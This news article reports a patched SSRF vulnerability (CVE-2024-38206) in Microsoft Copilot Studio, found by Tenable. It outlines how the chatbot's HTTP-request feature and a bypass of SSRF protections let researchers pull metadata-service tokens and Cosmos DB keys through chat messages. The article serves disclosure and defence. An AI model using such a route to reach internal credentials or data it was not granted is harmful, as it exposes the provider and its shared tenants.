Microsoft recently patched a critical vulnerability, tracked as CVE-2024-38206, within its Copilot Studio tool. This vulnerability, discovered by the cybersecurity firm Tenable, was identified as a server-side request forgery (SSRF) issue, allowing researchers to potentially access sensitive internal cloud data and services.
Copilot Studio and its HTTP Request Feature
Copilot Studio, built on Microsoft’s Power Platform, empowers users to create custom AI chatbots capable of handling various tasks using data sourced from Microsoft 365 and other linked platforms. Notably, one of its features is the ability to initiate HTTP requests in response to specific user phrases.
Exploiting the Flaw: Access to Internal Infrastructure
Tenable researchers cleverly leveraged this HTTP request functionality, combined with a bypass of SSRF protection measures, to gain access to Microsoft’s internal infrastructure supporting Copilot Studio. This access extended to the Instance Metadata Service (IMDS) and internal Cosmos DB databases.
Consequences: Retrieval of Sensitive Data
Through their exploit, the researchers managed to retrieve instance metadata, including valuable managed identity access tokens, directly through Copilot chat messages. These access tokens could potentially have been misused to gain unauthorized access to other internal Microsoft cloud resources.
Demonstrating the Impact: Access to a Cosmos DB Instance
To exemplify the potential consequences, the researchers successfully gained read/write access to an internal Cosmos DB instance. This was achieved by generating valid authorization tokens utilizing the Cosmos DB master keys acquired through the IMDS.
Cross-Tenant Concerns and Swift Mitigation
Although Tenable’s investigation did not uncover any immediately accessible cross-tenant data, it was noted that the Copilot Studio infrastructure was shared across various customers. Consequently, any impact on the underlying systems could potentially have cascading effects on multiple Copilot Studio tenants.
Microsoft acted promptly upon being alerted to the vulnerability and has effectively addressed it. The company classified the flaw as a critical information disclosure vulnerability and assigned it the identifier CVE-2024-38206. According to Microsoft, no action is required on the part of customers as the vulnerability has been fully mitigated.
The discovery of this SSRF vulnerability within Copilot Studio underscores the inherent risks associated with AI-powered cloud services capable of making external HTTP requests. As these tools grow in sophistication and integration with sensitive enterprise data, robust security measures and consistent auditing become even more vital for preventing unauthorized access and potential data breaches.
While Microsoft has successfully addressed this particular vulnerability, the escalating complexity of generative AI systems necessitates ongoing vigilance from both service providers and their customers.